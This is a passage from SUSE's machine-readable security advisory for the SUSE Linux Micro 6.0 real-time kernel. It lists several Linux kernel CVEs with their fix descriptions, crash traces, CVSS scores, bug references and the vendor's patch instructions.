2479.386782]I[0:launcher-loader: 1719] scsi_io_completion+0x88/0x160\n[ 2479.386808]I[0:launcher-loader: 1719] scsi_finish_command+0x17c/0x194\n[ 2479.386833]I\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54322",
"url": "https://www.suse.com/security/cve/CVE-2023-54322"
},
{
"category": "external",
"summary": "SUSE Bug 1255763 for CVE-2023-54322",
"url": "https://bugzilla.suse.com/1255763"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "low"
}
],
"title": "CVE-2023-54322"
},
{
"cve": "CVE-2023-54324",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54324"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndm: fix a race condition in retrieve_deps\n\nThere\u0027s a race condition in the multipath target when retrieve_deps\nraces with multipath_message calling dm_get_device and dm_put_device.\nretrieve_deps walks the list of open devices without holding any lock\nbut multipath may add or remove devices to the list while it is\nrunning. The end result may be memory corruption or use-after-free\nmemory access.\n\nSee this description of a UAF with multipath_message():\nhttps://listman.redhat.com/archives/dm-devel/2022-October/052373.html\n\nFix this bug by introducing a new rw semaphore \"devices_lock\". We grab\ndevices_lock for read in retrieve_deps and we grab it for write in\ndm_get_device and dm_put_device.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54324",
"url": "https://www.suse.com/security/cve/CVE-2023-54324"
},
{
"category": "external",
"summary": "SUSE Bug 1255759 for CVE-2023-54324",
"url": "https://bugzilla.suse.com/1255759"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54324"
},
{
"cve": "CVE-2023-54326",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54326"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmisc: pci_endpoint_test: Free IRQs before removing the device\n\nIn pci_endpoint_test_remove(), freeing the IRQs after removing the device\ncreates a small race window for IRQs to be received with the test device\nmemory already released, causing the IRQ handler to access invalid memory,\nresulting in an oops.\n\nFree the device IRQs before removing the device to avoid this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54326",
"url": "https://www.suse.com/security/cve/CVE-2023-54326"
},
{
"category": "external",
"summary": "SUSE Bug 1255758 for CVE-2023-54326",
"url": "https://bugzilla.suse.com/1255758"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54326"
},
{
"cve": "CVE-2024-26944",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-26944"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: zoned: fix use-after-free in do_zone_finish()\n\nShinichiro reported the following use-after-free triggered by the device\nreplace operation in fstests btrfs/070.\n\n BTRFS info (device nullb1): scrub: finished on devid 1 with status: 0\n ==================================================================\n BUG: KASAN: slab-use-after-free in do_zone_finish+0x91a/0xb90 [btrfs]\n Read of size 8 at addr ffff8881543c8060 by task btrfs-cleaner/3494007\n\n CPU: 0 PID: 3494007 Comm: btrfs-cleaner Tainted: G W 6.8.0-rc5-kts #1\n Hardware name: Supermicro Super Server/X11SPi-TF, BIOS 3.3 02/21/2020\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x5b/0x90\n print_report+0xcf/0x670\n ? __virt_addr_valid+0x200/0x3e0\n kasan_report+0xd8/0x110\n ? do_zone_finish+0x91a/0xb90 [btrfs]\n ? do_zone_finish+0x91a/0xb90 [btrfs]\n do_zone_finish+0x91a/0xb90 [btrfs]\n btrfs_delete_unused_bgs+0x5e1/0x1750 [btrfs]\n ? __pfx_btrfs_delete_unused_bgs+0x10/0x10 [btrfs]\n ? btrfs_put_root+0x2d/0x220 [btrfs]\n ? btrfs_clean_one_deleted_snapshot+0x299/0x430 [btrfs]\n cleaner_kthread+0x21e/0x380 [btrfs]\n ? __pfx_cleaner_kthread+0x10/0x10 [btrfs]\n kthread+0x2e3/0x3c0\n ? __pfx_kthread+0x10/0x10\n ret_from_fork+0x31/0x70\n ? __pfx_kthread+0x10/0x10\n ret_from_fork_asm+0x1b/0x30\n \u003c/TASK\u003e\n\n Allocated by task 3493983:\n kasan_save_stack+0x33/0x60\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0xaa/0xb0\n btrfs_alloc_device+0xb3/0x4e0 [btrfs]\n device_list_add.constprop.0+0x993/0x1630 [btrfs]\n btrfs_scan_one_device+0x219/0x3d0 [btrfs]\n btrfs_control_ioctl+0x26e/0x310 [btrfs]\n __x64_sys_ioctl+0x134/0x1b0\n do_syscall_64+0x99/0x190\n entry_SYSCALL_64_after_hwframe+0x6e/0x76\n\n Freed by task 3494056:\n kasan_save_stack+0x33/0x60\n kasan_save_track+0x14/0x30\n kasan_save_free_info+0x3f/0x60\n poison_slab_object+0x102/0x170\n __kasan_slab_free+0x32/0x70\n kfree+0x11b/0x320\n btrfs_rm_dev_replace_free_srcdev+0xca/0x280 [btrfs]\n btrfs_dev_replace_finishing+0xd7e/0x14f0 [btrfs]\n btrfs_dev_replace_by_ioctl+0x1286/0x25a0 [btrfs]\n btrfs_ioctl+0xb27/0x57d0 [btrfs]\n __x64_sys_ioctl+0x134/0x1b0\n do_syscall_64+0x99/0x190\n entry_SYSCALL_64_after_hwframe+0x6e/0x76\n\n The buggy address belongs to the object at ffff8881543c8000\n which belongs to the cache kmalloc-1k of size 1024\n The buggy address is located 96 bytes inside of\n freed 1024-byte region [ffff8881543c8000, ffff8881543c8400)\n\n The buggy address belongs to the physical page:\n page:00000000fe2c1285 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x1543c8\n head:00000000fe2c1285 order:3 entire_mapcount:0 nr_pages_mapped:0 pincount:0\n flags: 0x17ffffc0000840(slab|head|node=0|zone=2|lastcpupid=0x1fffff)\n page_type: 0xffffffff()\n raw: 0017ffffc0000840 ffff888100042dc0 ffffea0019e8f200 dead000000000002\n raw: 0000000000000000 0000000000100010 00000001ffffffff 0000000000000000\n page dumped because: kasan: bad access detected\n\n Memory state around the buggy address:\n ffff8881543c7f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n ffff8881543c7f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n \u003effff8881543c8000: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n ^\n ffff8881543c8080: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n ffff8881543c8100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n\nThis UAF happens because we\u0027re accessing stale zone information of a\nalready removed btrfs_device in do_zone_finish().\n\nThe sequence of events is as follows:\n\nbtrfs_dev_replace_start\n btrfs_scrub_dev\n btrfs_dev_replace_finishing\n btrfs_dev_replace_update_device_in_mapping_tree \u003c-- devices replaced\n btrfs_rm_dev_replace_free_srcdev\n btrfs_free_device \u003c-- device freed\n\ncleaner_kthread\n btrfs_delete_unused_bgs\n btrfs_zone_finish\n do_zone_finish \u003c-- refers the freed device\n\nThe reason for this is that we\u0027re using a\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-26944",
"url": "https://www.suse.com/security/cve/CVE-2024-26944"
},
{
"category": "external",
"summary": "SUSE Bug 1223731 for CVE-2024-26944",
"url": "https://bugzilla.suse.com/1223731"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2024-26944"
},
{
"cve": "CVE-2024-27005",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-27005"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ninterconnect: Don\u0027t access req_list while it\u0027s being manipulated\n\nThe icc_lock mutex was split into separate icc_lock and icc_bw_lock\nmutexes in [1] to avoid lockdep splats. However, this didn\u0027t adequately\nprotect access to icc_node::req_list.\n\nThe icc_set_bw() function will eventually iterate over req_list while\nonly holding icc_bw_lock, but req_list can be modified while only\nholding icc_lock. This causes races between icc_set_bw(), of_icc_get(),\nand icc_put().\n\nExample A:\n\n CPU0 CPU1\n ---- ----\n icc_set_bw(path_a)\n mutex_lock(\u0026icc_bw_lock);\n icc_put(path_b)\n mutex_lock(\u0026icc_lock);\n aggregate_requests()\n hlist_for_each_entry(r, ...\n hlist_del(...\n \u003cr = invalid pointer\u003e\n\nExample B:\n\n CPU0 CPU1\n ---- ----\n icc_set_bw(path_a)\n mutex_lock(\u0026icc_bw_lock);\n path_b = of_icc_get()\n of_icc_get_by_index()\n mutex_lock(\u0026icc_lock);\n path_find()\n path_init()\n aggregate_requests()\n hlist_for_each_entry(r, ...\n hlist_add_head(...\n \u003cr = invalid pointer\u003e\n\nFix this by ensuring icc_bw_lock is always held before manipulating\nicc_node::req_list. The additional places icc_bw_lock is held don\u0027t\nperform any memory allocations, so we should still be safe from the\noriginal lockdep splats that motivated the separate locks.\n\n[1] commit af42269c3523 (\"interconnect: Fix locking for runpm vs reclaim\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-27005",
"url": "https://www.suse.com/security/cve/CVE-2024-27005"
},
{
"category": "external",
"summary": "SUSE Bug 1223800 for CVE-2024-27005",
"url": "https://bugzilla.suse.com/1223800"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2024-27005"
},
{
"cve": "CVE-2024-42103",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-42103"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix adding block group to a reclaim list and the unused list during reclaim\n\nThere is a potential parallel list adding for retrying in\nbtrfs_reclaim_bgs_work and adding to the unused list. Since the block\ngroup is removed from the reclaim list and it is on a relocation work,\nit can be added into the unused list in parallel. When that happens,\nadding it to the reclaim list will corrupt the list head and trigger\nlist corruption like below.\n\nFix it by taking fs_info-\u003eunused_bgs_lock.\n\n [177.504][T2585409] BTRFS error (device nullb1): error relocating ch= unk 2415919104\n [177.514][T2585409] list_del corruption. next-\u003eprev should be ff1100= 0344b119c0, but was ff11000377e87c70. (next=3Dff110002390cd9c0)\n [177.529][T2585409] ------------[ cut here ]------------\n [177.537][T2585409] kernel BUG at lib/list_debug.c:65!\n [177.545][T2585409] Oops: invalid opcode: 0000 [#1] PREEMPT SMP KASAN NOPTI\n [177.555][T2585409] CPU: 9 PID: 2585409 Comm: kworker/u128:2 Tainted: G W 6.10.0-rc5-kts #1\n [177.568][T2585409] Hardware name: Supermicro SYS-520P-WTR/X12SPW-TF, BIOS 1.2 02/14/2022\n [177.579][T2585409] Workqueue: events_unbound btrfs_reclaim_bgs_work[btrfs]\n [177.589][T2585409] RIP: 0010:__list_del_entry_valid_or_report.cold+0x70/0x72\n [177.624][T2585409] RSP: 0018:ff11000377e87a70 EFLAGS: 00010286\n [177.633][T2585409] RAX: 000000000000006d RBX: ff11000344b119c0 RCX:0000000000000000\n [177.644][T2585409] RDX: 000000000000006d RSI: 0000000000000008 RDI:ffe21c006efd0f40\n [177.655][T2585409] RBP: ff110002e0509f78 R08: 0000000000000001 R09:ffe21c006efd0f08\n [177.665][T2585409] R10: ff11000377e87847 R11: 0000000000000000 R12:ff110002390cd9c0\n [177.676][T2585409] R13: ff11000344b119c0 R14: ff110002e0508000 R15:dffffc0000000000\n [177.687][T2585409] FS: 0000000000000000(0000) GS:ff11000fec880000(0000) knlGS:0000000000000000\n [177.700][T2585409] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n [177.709][T2585409] CR2: 00007f06bc7b1978 CR3: 0000001021e86005 CR4:0000000000771ef0\n [177.720][T2585409] DR0: 0000000000000000 DR1: 0000000000000000 DR2:0000000000000000\n [177.731][T2585409] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7:0000000000000400\n [177.742][T2585409] PKRU: 55555554\n [177.748][T2585409] Call Trace:\n [177.753][T2585409] \u003cTASK\u003e\n [177.759][T2585409] ? __die_body.cold+0x19/0x27\n [177.766][T2585409] ? die+0x2e/0x50\n [177.772][T2585409] ? do_trap+0x1ea/0x2d0\n [177.779][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72\n [177.788][T2585409] ? do_error_trap+0xa3/0x160\n [177.795][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72\n [177.805][T2585409] ? handle_invalid_op+0x2c/0x40\n [177.812][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72\n [177.820][T2585409] ? exc_invalid_op+0x2d/0x40\n [177.827][T2585409] ? asm_exc_invalid_op+0x1a/0x20\n [177.834][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72\n [177.843][T2585409] btrfs_delete_unused_bgs+0x3d9/0x14c0 [btrfs]\n\nThere is a similar retry_list code in btrfs_delete_unused_bgs(), but it is\nsafe, AFAICS. Since the block group was in the unused list, the used bytes\nshould be 0 when it was added to the unused list. Then, it checks\nblock_group-\u003e{used,reserved,pinned} are still 0 under the\nblock_group-\u003elock. So, they should be still eligible for the unused list,\nnot the reclaim list.\n\nThe reason it is safe there it\u0027s because because we\u0027re holding\nspace_info-\u003egroups_sem in write mode.\n\nThat means no other task can allocate from the block group, so while we\nare at deleted_unused_bgs() it\u0027s not possible for other tasks to\nallocate and deallocate extents from the block group, so it can\u0027t be\nadded to the unused list or the reclaim list by anyone else.\n\nThe bug can be reproduced by btrfs/166 after a few rounds. In practice\nthis can be hit when relocation cannot find more chunk space and ends\nwith ENOSPC.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-42103",
"url": "https://www.suse.com/security/cve/CVE-2024-42103"
},
{
"category": "external",
"summary": "SUSE Bug 1228490 for CVE-2024-42103",
"url": "https://bugzilla.suse.com/1228490"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2024-42103"
},
{
"cve": "CVE-2024-53070",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-53070"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: dwc3: fix fault at system suspend if device was already runtime suspended\n\nIf the device was already runtime suspended then during system suspend\nwe cannot access the device registers else it will crash.\n\nAlso we cannot access any registers after dwc3_core_exit() on some\nplatforms so move the dwc3_enable_susphy() call to the top.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-53070",
"url": "https://www.suse.com/security/cve/CVE-2024-53070"
},
{
"category": "external",
"summary": "SUSE Bug 1233563 for CVE-2024-53070",
"url": "https://bugzilla.suse.com/1233563"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2024-53070"
},
{
"cve": "CVE-2024-53093",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-53093"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-multipath: defer partition scanning\n\nWe need to suppress the partition scan from occuring within the\ncontroller\u0027s scan_work context. If a path error occurs here, the IO will\nwait until a path becomes available or all paths are torn down, but that\naction also occurs within scan_work, so it would deadlock. Defer the\npartion scan to a different context that does not block scan_work.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-53093",
"url": "https://www.suse.com/security/cve/CVE-2024-53093"
},
{
"category": "external",
"summary": "SUSE Bug 1233640 for CVE-2024-53093",
"url": "https://bugzilla.suse.com/1233640"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2024-53093"
},
{
"cve": "CVE-2024-53149",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-53149"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: typec: ucsi: glink: fix off-by-one in connector_status\n\nUCSI connector\u0027s indices start from 1 up to 3, PMIC_GLINK_MAX_PORTS.\nCorrect the condition in the pmic_glink_ucsi_connector_status()\ncallback, fixing Type-C orientation reporting for the third USB-C\nconnector.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-53149",
"url": "https://www.suse.com/security/cve/CVE-2024-53149"
},
{
"category": "external",
"summary": "SUSE Bug 1234842 for CVE-2024-53149",
"url": "https://bugzilla.suse.com/1234842"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
